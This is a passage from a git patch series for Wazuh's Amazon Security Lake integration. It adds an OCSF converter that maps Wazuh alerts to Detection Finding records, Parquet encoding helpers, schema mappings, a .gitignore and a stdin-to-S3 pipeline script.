logstash}/pipe-output.conf | 0 .../{ => logstash}/wazuh-s3.conf | 1 + .../amazon-security-lake/ocsf/converter.py | 125 +++++++++--------- .../amazon-security-lake/parquet/parquet.py | 20 +++ .../amazon-security-lake/parquet/test.py | 11 ++ .../amazon-security-lake/requirements.txt | 2 + 7 files changed, 102 insertions(+), 60 deletions(-) create mode 100644 integrations/amazon-security-lake/.gitignore rename integrations/amazon-security-lake/{ => logstash}/pipe-output.conf (100%) rename integrations/amazon-security-lake/{ => logstash}/wazuh-s3.conf (97%) create mode 100644 integrations/amazon-security-lake/parquet/parquet.py create mode 100644 integrations/amazon-security-lake/parquet/test.py create mode 100644 integrations/amazon-security-lake/requirements.txt diff --git a/integrations/amazon-security-lake/.gitignore b/integrations/amazon-security-lake/.gitignore new file mode 100644 index 0000000000000..56bf77e1b8d6f --- /dev/null +++ b/integrations/amazon-security-lake/.gitignore @@ -0,0 +1,3 @@ +.venv/ +wazuh-event.ocsf.json +*.parquet \ No newline at end of file diff --git a/integrations/amazon-security-lake/pipe-output.conf b/integrations/amazon-security-lake/logstash/pipe-output.conf similarity index 100% rename from integrations/amazon-security-lake/pipe-output.conf rename to integrations/amazon-security-lake/logstash/pipe-output.conf diff --git a/integrations/amazon-security-lake/wazuh-s3.conf b/integrations/amazon-security-lake/logstash/wazuh-s3.conf similarity index 97% rename from integrations/amazon-security-lake/wazuh-s3.conf rename to integrations/amazon-security-lake/logstash/wazuh-s3.conf index 108423afd3193..6ca2ca0d5a08f 100644 --- a/integrations/amazon-security-lake/wazuh-s3.conf +++ b/integrations/amazon-security-lake/logstash/wazuh-s3.conf @@ -15,6 +15,7 @@ input { } } }' + target => "_source" schedule => "* * * * *" } } diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py index a9168aead1e1a..fba84e7304dc7 100644 --- a/integrations/amazon-security-lake/ocsf/converter.py +++ b/integrations/amazon-security-lake/ocsf/converter.py @@ -3,6 +3,7 @@ # event comes from Filebeat event = {} + def normalize(level: int) -> int: """ Normalizes rule level into the 0-6 range, required by OCSF. @@ -10,73 +11,77 @@ def normalize(level: int) -> int: # TODO normalization return level + +def join(iterable, separator=","): + return (separator.join(iterable)) + + def convert(event: dict) -> dict: """ Converts Wazuh events to OCSF's Detecting Finding (2004) class. """ ocsf_class_template = \ - { - "activity_id": 1, - "category_name": "Findings", - "category_uid": 2, - "class_name": "Detection Finding", - "class_uid": 2004, - "count": event["_source"]["rule"]["firedtimes"], - "message": event["_source"]["rule"]["description"], - "finding_info": { - "analytic": { - "category": event["_source"]["rule"]["groups"], # Err: rule.groups is a string array, but analytic.category is a string - "name": event["_source"]["decoder"]["name"], - "type": "Rule", # analytic.type is redundant together with type_id - "type_id": 1, - "uid": event["_source"]["rule"]["id"], - }, - "attacks": { - "tactic": event["_source"]["rule"]["mitre"]["tactic"], # Err: rule.mitre.tactic is a string array, but attacks.tactic is an object - "technique": event["_source"]["rule"]["mitre"]["technique"], # Err: rule.mitre.technique is a string array, but attacks.technique is an object - "version": "v13.1" - }, - "title": event["_source"]["rule"]["description"], - "types": [ - event["_source"]["input"]["type"] - ], - "uid": event["_source"]['id'] - }, - "metadata": { - "log_name": "Security events", - "log_provider": "Wazuh", - "product": { - "name": "Wazuh", - # Skipped. - # OCSF description of this field is: The version of the product, as - # defined by the event source. For example: 2013.1.3-beta. We do not - # save such info as part of the event data. - # "version": "4.9.0", - "lang": "en", - "vendor_name": "Wazuh, Inc,." + { + "activity_id": 1, + "category_name": "Findings", + "category_uid": 2, + "class_name": "Detection Finding", + "class_uid": 2004, + "count": event["_source"]["rule"]["firedtimes"], + "message": event["_source"]["rule"]["description"], + "finding_info": { + "analytic": { + "category": join(event["_source"]["rule"]["groups"]), + "name": event["_source"]["decoder"]["name"], + "type_id": 1, + "uid": event["_source"]["rule"]["id"], + }, + "attacks": { + "tactic": { + "name": join(event["_source"]["rule"]["mitre"]["tactic"]), + }, + "technique": { + "name": join(event["_source"]["rule"]["mitre"]["technique"]), + "uid": join(event["_source"]["rule"]["mitre"]["id"]), + }, + "version": "v13.1" + }, + "title": event["_source"]["rule"]["description"], + "types": [ + event["_source"]["input"]["type"] + ], + "uid": event["_source"]['id'] }, - "version": "1.1.0", - }, - "raw_data": event["_source"]["full_log"], - "resources": [ - { - "name": event["_source"]["agent"]["name"], - "uid": event["_source"]["agent"]["id"] + "metadata": { + "log_name": "Security events", + "log_provider": "Wazuh", + "product": { + "name": "Wazuh", + "lang": "en", + "vendor_name": "Wazuh, Inc,." + }, + "version": "1.1.0", }, - ], - "risk_score": event["_source"]["rule"]["level"], - "severity_id": normalize(event["_source"]["rule"]["level"]), - "status_id": 99, - "time": event["_source"]["timestamp"], - "type_uid": 200401, - "unmapped": { - "data_sources": [ - event["_index"], - event["_source"]["location"], - event["_source"]["manager"]["name"] + "raw_data": event["_source"]["full_log"], + "resources": [ + { + "name": event["_source"]["agent"]["name"], + "uid": event["_source"]["agent"]["id"] + }, ], - "nist": event["_source"]["rule"]["nist_800_53"], # Array + "risk_score": event["_source"]["rule"]["level"], + "severity_id": normalize(event["_source"]["rule"]["level"]), + "status_id": 99, + "time": event["_source"]["timestamp"], + "type_uid": 200401, + "unmapped": { + "data_sources": [ + event["_index"], + event["_source"]["location"], + event["_source"]["manager"]["name"] + ], + "nist": event["_source"]["rule"]["nist_800_53"], # Array + } } - } - return ocsf_class_template \ No newline at end of file + return ocsf_class_template diff --git a/integrations/amazon-security-lake/parquet/parquet.py b/integrations/amazon-security-lake/parquet/parquet.py new file mode 100644 index 0000000000000..79a146f0993a2 --- /dev/null +++ b/integrations/amazon-security-lake/parquet/parquet.py @@ -0,0 +1,20 @@ + +import pyarrow as pa +import pyarrow.parquet as pq +import pyarrow.fs as pafs + + +class Parquet: + + @staticmethod + def encode(data: dict): + return pa.Table.from_pydict(data) + + @staticmethod + def to_s3(data: pa.Table, s3: pafs.S3FileSystem): + pass + + @staticmethod + def to_file(data: pa.Table, path: str): + # pq.write_to_dataset(table=data, root_path=path) + pq.write_table(data, path) diff --git a/integrations/amazon-security-lake/parquet/test.py b/integrations/amazon-security-lake/parquet/test.py new file mode 100644 index 0000000000000..2022111b25e33 --- /dev/null +++ b/integrations/amazon-security-lake/parquet/test.py @@ -0,0 +1,11 @@ +#!/usr/bin/python + +import pyarrow as pa +from parquet import Parquet +import json + +# converted_event = {} +with open("wazuh-event.ocsf.json", "r") as fd: + events = [json.load(fd)] + table = pa.Table.from_pylist(events) + Parquet.to_file(table, "output/wazuh-event.ocsf.parquet") diff --git a/integrations/amazon-security-lake/requirements.txt b/integrations/amazon-security-lake/requirements.txt new file mode 100644 index 0000000000000..8c7a1cbaae79b --- /dev/null +++ b/integrations/amazon-security-lake/requirements.txt @@ -0,0 +1,2 @@ +pyarrow>=10.0.1 +parquet-tools>=0.2.15 \ No newline at end of file From 5c5ff2460219e16dae716f2b4cb3e4b4e493b391 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Fri, 9 Feb 2024 17:33:43 +0100 Subject: [PATCH 14/34] Update .gitignore --- integrations/amazon-security-lake/.gitignore | 180 ++++++++++++++++++- 1 file changed, 178 insertions(+), 2 deletions(-) diff --git a/integrations/amazon-security-lake/.gitignore b/integrations/amazon-security-lake/.gitignore index 56bf77e1b8d6f..0740f723d0c79 100644 --- a/integrations/amazon-security-lake/.gitignore +++ b/integrations/amazon-security-lake/.gitignore @@ -1,3 +1,179 @@ -.venv/ wazuh-event.ocsf.json -*.parquet \ No newline at end of file +*.parquet + +# Created by https://www.toptal.com/developers/gitignore/api/python +# Edit at https://www.toptal.com/developers/gitignore?templates=python + +### Python ### +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +# C extensions +*.so + +# Distribution / packaging +.Python +build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +share/python-wheels/ +*.egg-info/ +.installed.cfg +*.egg +MANIFEST + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.nox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +*.py,cover +.hypothesis/ +.pytest_cache/ +cover/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py +db.sqlite3 +db.sqlite3-journal + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +.pybuilder/ +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# IPython +profile_default/ +ipython_config.py + +# pyenv +# For a library or package, you might want to ignore these files since the code is +# intended to run in multiple environments; otherwise, check them in: +# .python-version + +# pipenv +# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. +# However, in case of collaboration, if having platform-specific dependencies or dependencies +# having no cross-platform support, pipenv may install dependencies that don't work, or not +# install all needed dependencies. +#Pipfile.lock + +# poetry +# Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control. +# This is especially recommended for binary packages to ensure reproducibility, and is more +# commonly ignored for libraries. +# https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control +#poetry.lock + +# pdm +# Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control. +#pdm.lock +# pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it +# in version control. +# https://pdm.fming.dev/#use-with-ide +.pdm.toml + +# PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm +__pypackages__/ + +# Celery stuff +celerybeat-schedule +celerybeat.pid + +# SageMath parsed files +*.sage.py + +# Environments +.env +.venv +env/ +venv/ +ENV/ +env.bak/ +venv.bak/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ +.dmypy.json +dmypy.json + +# Pyre type checker +.pyre/ + +# pytype static type analyzer +.pytype/ + +# Cython debug symbols +cython_debug/ + +# PyCharm +# JetBrains specific template is maintained in a separate JetBrains.gitignore that can +# be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore +# and can be added to the global gitignore or merged into this file. For a more nuclear +# option (not recommended) you can uncomment the following to ignore the entire idea folder. +#.idea/ + +### Python Patch ### +# Poetry local configuration file - https://python-poetry.org/docs/configuration/#local-configuration +poetry.toml + +# ruff +.ruff_cache/ + +# LSP config files +pyrightconfig.json + +# End of https://www.toptal.com/developers/gitignore/api/python \ No newline at end of file From a39ef909d11c4941551e63956b4ef7822c745a29 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 8 Feb 2024 08:19:39 -0300 Subject: [PATCH 15/34] Include the contents of the alert under unmapped --- integrations/stdin_to_securitylake.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 3a6145747783a..09fba3ad554d4 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -26,6 +26,9 @@ def map_to_ocsf(alert_dictionary, mappings, ocsf_output): for field in depth_levels[1:]: current_level = current_level[field] ocsf_output[key] = current_level + ### We probably need to crop the fields we already + ### mapped to OCSF from ocsf_output + ocsf_output['unmapped'] = alert_dictionary def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: From 97725bcd97667aff3664055447814bf277b6b89d Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 8 Feb 2024 11:44:40 -0300 Subject: [PATCH 16/34] Add support for different OCSF schema versions --- integrations/ocsf-mapping.json | 116 ++++++++++++++++++-------- integrations/stdin_to_securitylake.py | 13 +-- 2 files changed, 87 insertions(+), 42 deletions(-) diff --git a/integrations/ocsf-mapping.json b/integrations/ocsf-mapping.json index b2cf6d3b8d3f7..c1238dac285df 100644 --- a/integrations/ocsf-mapping.json +++ b/integrations/ocsf-mapping.json @@ -1,42 +1,86 @@ { - "constants": + "1.0.0": { - "activity_id" : 1, - "analytic.type" : "Rule", - "analytic.type_id" : 1, - "attacks.version" : "v13.1", - "category_name" : "Findings", - "category_uid" : 2, - "class_name" : "Security Finding", - "class_uid" : 2001, - "metadata.log_name" : "Security events", - "metadata.log_provider" : "Wazuh", - "metadata.product.lang" : "en", - "metadata.product.name" : "Wazuh", - "metadata.product.vendor_name" : "Wazuh, Inc.", - "metadata.product.version" : "4.9.0", - "state_id" : 99, - "type_uid" : 200101 + "constants": + { + "activity_id" : 1, + "analytic.type" : "Rule", + "analytic.type_id" : 1, + "attacks.version" : "v13.1", + "category_name" : "Findings", + "category_uid" : 2, + "class_name" : "Security Finding", + "class_uid" : 2001, + "metadata.log_name" : "Security events", + "metadata.log_provider" : "Wazuh", + "metadata.product.lang" : "en", + "metadata.product.name" : "Wazuh", + "metadata.product.vendor_name" : "Wazuh, Inc.", + "metadata.product.version" : "4.9.0", + "status_id" : 99, + "type_uid" : 200101 + }, + "mappings": + { + "analytic.category" : "rule.groups", + "analytic.name" : "decoder.name", + "analytic.uid" : "rule.id", + "attacks.tactics" : "rule.mitre.tactic", + "attacks.technique" : "rule.mitre.technique", + "count" : "rule.firedtimes", + "data_sources" : ["_index", "location", "manager.name"], + "finding.title" : "rule.description", + "finding.types" : "input.type", + "finding.uid" : "id", + "message" : "rule.description", + "nist" : "rule.nist_800_53", + "raw_data" : "full_log", + "resources.name" : "agent.name", + "resources.uid" : "agent.id", + "risk_score" : "rule.level", + "severity_id" : "rule.level", + "time" : "timestamp" + } }, - "mappings": + "1.1.0": { - "analytic.category" : "rule.groups", - "analytic.name" : "decoder.name", - "analytic.uid" : "rule.id", - "attacks.tactics" : "rule.mitre.tactic", - "attacks.technique" : "rule.mitre.technique", - "count" : "rule.firedtimes", - "data_sources" : ["_index", "location", "manager.name"], - "finding.title" : "rule.description", - "finding.type" : "input.type", - "finding.uid" : "id", - "message" : "rule.description", - "nist" : "rule.nist_800_53", - "raw_data" : "full_log", - "resources.name" : "agent.name", - "resources.uid" : "agent.id", - "risk_score" : "rule.level", - "severity_id" : "rule.level", - "time" : "timestamp" + "constants": + { + "activity_id" : 1, + "category_name" : "Findings", + "category_uid" : 2, + "class_name" : "Security Finding", + "class_uid" : 2001, + "finding_info.analytic.type" : "Rule", + "finding_info.analytic.type_id" : 1, + "finding_info.attacks.version" : "v13.1", + "metadata.log_name" : "Security events", + "metadata.log_provider" : "Wazuh", + "metadata.product.lang" : "en", + "metadata.product.name" : "Wazuh", + "metadata.product.vendor_name" : "Wazuh, Inc.", + "metadata.product.version" : "4.9.0", + "status_id" : 99, + "type_uid" : 200101 + }, + "mappings": + { + "count" : "rule.firedtimes", + "finding_info.analytic.category" : "rule.groups", + "finding_info.analytic.name" : "decoder.name", + "finding_info.analytic.uid" : "rule.id", + "finding_info.attacks.tactic" : "rule.mitre.tactic", + "finding_info.attacks.technique" : "rule.mitre.technique", + "finding_info.title" : "rule.description", + "finding_info.types" : "input.type", + "finding_info.uid" : "id", + "message" : "rule.description", + "raw_data" : "full_log", + "resources.name" : "agent.name", + "resources.uid" : "agent.id", + "risk_score" : "rule.level", + "severity_id" : "rule.level", + "time" : "timestamp" + } } } diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 09fba3ad554d4..5efb9da83bb80 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -13,13 +13,13 @@ s3 = fs.S3FileSystem() -def map_to_ocsf(alert_dictionary, mappings, ocsf_output): +def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema): ocsf_output = {} ### Put constants into the output alert - ocsf_output |= mappings['constants'] + ocsf_output |= mappings[ocsfschema]['constants'] - for key in mappings['mappings']: - dotted_destination_field = mappings['mappings'].get(key) + for key in mappings[ocsfschema]['mappings']: + dotted_destination_field = mappings[ocsfschema]['mappings'].get(key) depth_levels = dotted_destination.split('.') current_level = alert_dictionary[depth_levels[0]] if len(depth_levels>1): @@ -51,7 +51,7 @@ def map_block(fileobject, length, mappings): alert = json.loads(line) ocsf_mapped_alert = {} map_to_ocsf(alert, mappings, ocsf_mapped_alert): - output.append(ocsf_mapped_alert) + output.append(ocsf_mapped_alert) return output def get_elapsedseconds(reference_timestamp): @@ -66,6 +66,7 @@ def parse_arguments(): parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') + parser.add_argument('-v','--ocsfschema', action='store', default='1.1.0', help='Version of the OCSF schema to use') parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)') debugging = parser.add_argument_group('debugging') debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') @@ -95,7 +96,7 @@ def parse_arguments(): ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory - current_block = map_block(stdin, args.linebuffer, mappings) + current_block = map_block(stdin, args.linebuffer, mappings,args.ocsfschema) if current_block[-1] == block_ending : output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) From e313572485453506a8dda93711e0168bbcd2dec5 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 15 Feb 2024 12:19:31 -0300 Subject: [PATCH 17/34] Use custom ocsf module to map alerts --- .../stdin_to_securitylake.py | 38 ++++++++++--------- 1 file changed, 20 insertions(+), 18 deletions(-) rename integrations/{ => amazon-security-lake}/stdin_to_securitylake.py (84%) diff --git a/integrations/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py similarity index 84% rename from integrations/stdin_to_securitylake.py rename to integrations/amazon-security-lake/stdin_to_securitylake.py index 5efb9da83bb80..21374d85ee0ad 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -9,26 +9,28 @@ from datetime import datetime from pyarrow import parquet, Table, fs +import ocsf + block_ending = { "block_ending": True } s3 = fs.S3FileSystem() -def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema): - ocsf_output = {} - ### Put constants into the output alert - ocsf_output |= mappings[ocsfschema]['constants'] - - for key in mappings[ocsfschema]['mappings']: - dotted_destination_field = mappings[ocsfschema]['mappings'].get(key) - depth_levels = dotted_destination.split('.') - current_level = alert_dictionary[depth_levels[0]] - if len(depth_levels>1): - for field in depth_levels[1:]: - current_level = current_level[field] - ocsf_output[key] = current_level - ### We probably need to crop the fields we already - ### mapped to OCSF from ocsf_output - ocsf_output['unmapped'] = alert_dictionary +#def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema): +# ocsf_output = {} +# ### Put constants into the output alert +# ocsf_output |= mappings[ocsfschema]['constants'] +# +# for key in mappings[ocsfschema]['mappings']: +# dotted_destination_field = mappings[ocsfschema]['mappings'].get(key) +# depth_levels = dotted_destination.split('.') +# current_level = alert_dictionary[depth_levels[0]] +# if len(depth_levels>1): +# for field in depth_levels[1:]: +# current_level = current_level[field] +# ocsf_output[key] = current_level +# ### We probably need to crop the fields we already +# ### mapped to OCSF from ocsf_output +# ocsf_output['unmapped'] = alert_dictionary def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: @@ -49,8 +51,8 @@ def map_block(fileobject, length, mappings): output.append(block_ending) break alert = json.loads(line) - ocsf_mapped_alert = {} - map_to_ocsf(alert, mappings, ocsf_mapped_alert): + ocsf_mapped_alert = ocsf.convert(alert) + #map_to_ocsf(alert, mappings, ocsf_mapped_alert): output.append(ocsf_mapped_alert) return output From 4896d159912cdfc627e52eba2ebac3f5790d541e Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 15 Feb 2024 12:53:40 -0300 Subject: [PATCH 18/34] Modify script to use converter class --- .../amazon-security-lake/ocsf/converter.py | 40 ++++++++--------- .../stdin_to_securitylake.py | 45 +++++++++---------- 2 files changed, 42 insertions(+), 43 deletions(-) diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py index fba84e7304dc7..2a14b75957c97 100644 --- a/integrations/amazon-security-lake/ocsf/converter.py +++ b/integrations/amazon-security-lake/ocsf/converter.py @@ -27,30 +27,30 @@ def convert(event: dict) -> dict: "category_uid": 2, "class_name": "Detection Finding", "class_uid": 2004, - "count": event["_source"]["rule"]["firedtimes"], - "message": event["_source"]["rule"]["description"], + "count": event["rule"]["firedtimes"], + "message": event["rule"]["description"], "finding_info": { "analytic": { - "category": join(event["_source"]["rule"]["groups"]), - "name": event["_source"]["decoder"]["name"], + "category": join(event["rule"]["groups"]), + "name": event["decoder"]["name"], "type_id": 1, - "uid": event["_source"]["rule"]["id"], + "uid": event["rule"]["id"], }, "attacks": { "tactic": { - "name": join(event["_source"]["rule"]["mitre"]["tactic"]), + "name": join(event["rule"]["mitre"]["tactic"]), }, "technique": { - "name": join(event["_source"]["rule"]["mitre"]["technique"]), - "uid": join(event["_source"]["rule"]["mitre"]["id"]), + "name": join(event["rule"]["mitre"]["technique"]), + "uid": join(event["rule"]["mitre"]["id"]), }, "version": "v13.1" }, - "title": event["_source"]["rule"]["description"], + "title": event["rule"]["description"], "types": [ - event["_source"]["input"]["type"] + event["input"]["type"] ], - "uid": event["_source"]['id'] + "uid": event['id'] }, "metadata": { "log_name": "Security events", @@ -62,25 +62,25 @@ def convert(event: dict) -> dict: }, "version": "1.1.0", }, - "raw_data": event["_source"]["full_log"], + "raw_data": event["full_log"], "resources": [ { - "name": event["_source"]["agent"]["name"], - "uid": event["_source"]["agent"]["id"] + "name": event["agent"]["name"], + "uid": event["agent"]["id"] }, ], - "risk_score": event["_source"]["rule"]["level"], - "severity_id": normalize(event["_source"]["rule"]["level"]), + "risk_score": event["rule"]["level"], + "severity_id": normalize(event["rule"]["level"]), "status_id": 99, - "time": event["_source"]["timestamp"], + "time": event["timestamp"], "type_uid": 200401, "unmapped": { "data_sources": [ event["_index"], - event["_source"]["location"], - event["_source"]["manager"]["name"] + event["location"], + event["manager"]["name"] ], - "nist": event["_source"]["rule"]["nist_800_53"], # Array + "nist": event["rule"]["nist_800_53"], # Array } } diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index 21374d85ee0ad..49926a8aa1d64 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -6,10 +6,10 @@ import logging import time import json -from datetime import datetime +import datetime from pyarrow import parquet, Table, fs -import ocsf +from ocsf import converter block_ending = { "block_ending": True } @@ -43,7 +43,7 @@ def encode_parquet(list,bucket_name,folder): table = Table.from_pylist(list) parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name, folder)) -def map_block(fileobject, length, mappings): +def map_block(fileobject, length): output=[] for line in range(0, length): line = fileobject.readline() @@ -51,44 +51,41 @@ def map_block(fileobject, length, mappings): output.append(block_ending) break alert = json.loads(line) - ocsf_mapped_alert = ocsf.convert(alert) + ocsf_mapped_alert = converter.convert(alert) #map_to_ocsf(alert, mappings, ocsf_mapped_alert): - output.append(ocsf_mapped_alert) + output.append(ocsf_mapped_alert) return output def get_elapsedseconds(reference_timestamp): - current_time = datetime.now(tz='UTC') + current_time = datetime.datetime.now(datetime.timezone.utc) return (current_time - reference_timestamp).total_seconds() -def parse_arguments(): + +if __name__ == "__main__": + clock = datetime.datetime.now(datetime.timezone.utc) + clockstr = clock.strftime('%F_%H.%M.%S') parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') parser.add_argument('-b','--bucketname', action='store', help='Name of the output S3 bucket') parser.add_argument('-f','--foldername', action='store', help='Name of the output S3 bucket\'s folder') - parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval for pushing data to Security Lake') + parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') parser.add_argument('-v','--ocsfschema', action='store', default='1.1.0', help='Version of the OCSF schema to use') parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)') - debugging = parser.add_argument_group('debugging') - debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') - debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') + parser.add_argument('-o','--output', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') + parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') args = parser.parse_args() - -if __name__ == "__main__": - clock = datetime.now(tz='UTC') - clockstr = clock.strftime('%F_%H.%M.%S') - parse_arguments() - logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG) + logging.basicConfig(format='%(asctime)s %(message)s', filename=args.output, encoding='utf-8', level=logging.DEBUG) logging.info('BUFFERING STDIN') try: - with open(ocsf_mapping_filename) as jsonfile: - mappings = json.loads(jsonfile.read()) + #with open(ocsf_mapping_filename) as jsonfile: + # mappings = json.loads(jsonfile.read()) - with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin: + with os.fdopen(sys.stdin.fileno(), 'rt') as stdin: output_buffer = [] - starttimestamp = datetime.now(tz='UTC') + starttimestamp = datetime.datetime.now(datetime.timezone.utc) try: while True: @@ -98,14 +95,14 @@ def parse_arguments(): ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory - current_block = map_block(stdin, args.linebuffer, mappings,args.ocsfschema) + current_block = map_block(stdin, args.linebuffer ) if current_block[-1] == block_ending : output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: encode_parquet(output_buffer,args.bucketname,args.foldername) logging.debug(json.dumps(output_buffer)) - starttimestamp = datetime.now(tz='UTC') + starttimestamp = datetime.datetime.now(datetime.timezone.utc) output_buffer = [] output_buffer.append(current_block) @@ -117,4 +114,6 @@ def parse_arguments(): except Exception as e: logging.error("Error running script") + logging.error(e) + raise exit(1) From 7fd25d1213e605ceac965eb3eb31395c05072b3f Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 16 Feb 2024 15:28:51 -0300 Subject: [PATCH 19/34] Code polish and fix errors --- .../amazon-security-lake/ocsf/converter.py | 152 +++++++++--------- .../stdin_to_securitylake.py | 87 +++------- 2 files changed, 102 insertions(+), 137 deletions(-) diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py index 2a14b75957c97..c927afa8fe87f 100644 --- a/integrations/amazon-security-lake/ocsf/converter.py +++ b/integrations/amazon-security-lake/ocsf/converter.py @@ -1,87 +1,89 @@ -#!/usr/bin/python +#!/usr/bin/python3 # event comes from Filebeat -event = {} - +#event = {} +#print(event) def normalize(level: int) -> int: - """ - Normalizes rule level into the 0-6 range, required by OCSF. - """ - # TODO normalization - return level + """ + Normalizes rule level into the 0-6 range, required by OCSF. + """ + # TODO normalization + return level def join(iterable, separator=","): - return (separator.join(iterable)) + return (separator.join(iterable)) def convert(event: dict) -> dict: - """ - Converts Wazuh events to OCSF's Detecting Finding (2004) class. - """ - ocsf_class_template = \ + """ + Converts Wazuh events to OCSF's Detecting Finding (2004) class. + """ + ocsf_class_template = \ + { + "activity_id": 1, + "category_name": "Findings", + "category_uid": 2, + "class_name": "Detection Finding", + "class_uid": 2004, + "count": event["_source"]["rule"]["firedtimes"], + "message": event["_source"]["rule"]["description"], + "finding_info": { + "analytic": { + "category": join(event["_source"]["rule"]["groups"]), + "name": event["_source"]["decoder"]["name"], + "type_id": 1, + "uid": event["_source"]["rule"]["id"], + }, + "attacks": { + "tactic": { + #"name": join(event["_source"]["rule"]["mitre"]["tactic"]), + "dummy": True + }, + "technique": { + #"name": join(event["_source"]["rule"]["mitre"]["technique"]), + #"uid": join(event["_source"]["rule"]["mitre"]["id"]), + "dummy": True + }, + "version": "v13.1" + }, + "title": event["_source"]["rule"]["description"], + "types": [ + event["_source"]["input"]["type"] + ], + "uid": event["_source"]['id'] + }, + "metadata": { + "log_name": "Security events", + "log_provider": "Wazuh", + "product": { + "name": "Wazuh", + "lang": "en", + "vendor_name": "Wazuh, Inc,." + }, + "version": "1.1.0", + }, + #"raw_data": event["_source"]["full_log"], + "resources": [ { - "activity_id": 1, - "category_name": "Findings", - "category_uid": 2, - "class_name": "Detection Finding", - "class_uid": 2004, - "count": event["rule"]["firedtimes"], - "message": event["rule"]["description"], - "finding_info": { - "analytic": { - "category": join(event["rule"]["groups"]), - "name": event["decoder"]["name"], - "type_id": 1, - "uid": event["rule"]["id"], - }, - "attacks": { - "tactic": { - "name": join(event["rule"]["mitre"]["tactic"]), - }, - "technique": { - "name": join(event["rule"]["mitre"]["technique"]), - "uid": join(event["rule"]["mitre"]["id"]), - }, - "version": "v13.1" - }, - "title": event["rule"]["description"], - "types": [ - event["input"]["type"] - ], - 